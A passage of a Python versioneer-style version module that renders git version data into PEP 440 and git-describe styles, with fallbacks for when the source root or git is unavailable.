rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.